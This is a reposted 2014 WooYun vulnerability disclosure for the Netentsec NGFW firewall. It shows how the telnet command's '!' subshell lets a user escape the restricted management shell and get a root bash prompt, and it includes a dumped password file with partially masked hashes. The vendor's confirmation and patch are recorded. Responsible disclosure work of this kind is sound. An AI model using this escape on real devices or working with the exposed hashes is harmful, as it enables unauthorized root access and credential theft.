发新话题
打印

网康NGFW跳出沙盒直接访问设备内文件

网康NGFW跳出沙盒直接访问设备内文件

漏洞概要
缺陷编号:        WooYun-2014-60065
漏洞标题:        网康NGFW跳出沙盒直接访问设备内文件
相关厂商:        网康科技
漏洞作者:        路人甲
提交时间:        2014-05-09 17:16
修复时间:        2014-08-07 17:18
公开时间:        2014-08-07 17:18
漏洞类型:        非授权访问
危害等级:        中
自评Rank:        10
漏洞状态:        厂商已经修复
漏洞来源:        http://www.wooyun.org
Tags标签:       设计缺陷/边界绕过 敏感端口对外访问
未授权访问
漏洞详情披露状态:
2014-05-09:        细节已通知厂商并且等待厂商处理中
2014-05-12:        厂商已经确认,细节仅向厂商公开
2014-05-22:        细节向核心白帽子及相关领域专家公开
2014-06-01:        细节向普通白帽子公开
2014-06-21:        细节向实习白帽子公开
2014-08-07:        厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:听说提交网康的漏洞有钱拿
详细说明:问题出在对telnet命令的判断上,只要telnet命令有参数,就允许执行(默认shell只能完成设备本身的管理相关的功能)。

但是进了telnet的命令,就可以执行外部命令了,包括shell


code 区域[root@NGFW ~]# telnet -n test
telnet> help
Commands may be abbreviated.  Commands are:

close           close current connection
logout          forcibly logout remote user and close the connection
display         display operating parameters
mode            try to enter line or character mode ('mode ?' for more)
open            connect to a site
quit            exit telnet
send            transmit special characters ('send ?' for more)
set             set operating parameters ('set ?' for more)
unset           unset operating parameters ('unset ?' for more)
status          print status information
toggle          toggle operating parameters ('toggle ?' for more)
slc             change state of special charaters ('slc ?' for more)
z               suspend telnet
!               invoke a subshell
environ         change environment variables ('environ ?' for more)
?               print help information
telnet> !/bin/bash  
bash: complete: -E: invalid option
complete: usage: complete [-abcdefgjksuv] [-pr] [-o option] [-A action] [-G globpat] [-W wordlist] [-P prefix] [-S suffix] [-X filterpat] [-F function] [-C command] [name ...]
bash: complete: -D: invalid option
complete: usage: complete [-abcdefgjksuv] [-pr] [-o option] [-A action] [-G globpat] [-W wordlist] [-P prefix] [-S suffix] [-X filterpat] [-F function] [-C command] [name ...]
[I have no name!@NGFW ~]# w
17:27:26 up  2:34,  1 user,  load average: 3.19, 2.88, 3.08
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
[I have no name!@NGFW ~]# id
uid=0 gid=0(root) groups=0(root),502(vyattacfg),503(vyattaop)
[I have no name!@NGFW ~]# exit
telnet> [root@NGFW ~]#
[root@NGFW ~]#
漏洞证明:你们的系统竟然密码不写在shadow里面


code 区域root1$9HNbC4XF$打码5wFX1:15639:0:99999:7:::
bin:*:15805:0:99999:7:::
daemon:*:15805:0:99999:7:::
adm:*:15805:0:99999:7:::
lp:*:15805:0:99999:7:::
sync:*:15805:0:99999:7:::
shutdown:*:15805:0:99999:7:::
halt:*:15805:0:99999:7:::
mail:*:15805:0:99999:7:::
news:*:15805:0:99999:7:::
uucp:*:15805:0:99999:7:::
operator:*:15805:0:99999:7:::
games:*:15805:0:99999:7:::
gopher:*:15805:0:99999:7:::
ftp:*:15805:0:99999:7:::
nobody:*:15805:0:99999:7:::
distcache:!!:15805:0:99999:7:::
vcsa:!!:15805:0:99999:7:::
pcap:!!:15805:0:99999:7:::
ntp:!!:15805:0:99999:7:::
dbus:!!:15805:0:99999:7:::
apache:!!:15805:0:99999:7:::
mailnull:!!:15805:0:99999:7:::
smmsp:!!:15805:0:99999:7:::
sshd:!!:15805:0:99999:7:::
haldaemon:!!:15805:0:99999:7:::
netentsec1$UYIQ2Phc$U打码y.GiyvG7.Nu91:15805:0:99999:7:::
postgres:!!:15805:0:99999:7:::
quagga:!!:15805:0:99999:7:::
vyatta:!$1$y9RDC/fm$fs7/W打码pTG9k1:15805:0:99999:7:::
admin1$7Crwx2MW$2LvR打码Gbw6ZAfO0:15805:0:99999:7:::
lighttpd:!!:15805:0:99999:7:::
ldap:!!:15805:0:99999:7:::
修复方案:多判断下参数
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2014-05-12 09:48
厂商回复:感谢反馈,将尽快发布更新补丁解决。
最新状态:2014-07-14:已通过更新补丁解决

原文:http://www.wooyun.org/bugs/wooyun-2014-060065

[ 本帖最后由 linda 于 2016-2-16 11:09 编辑 ]

TOP

发新话题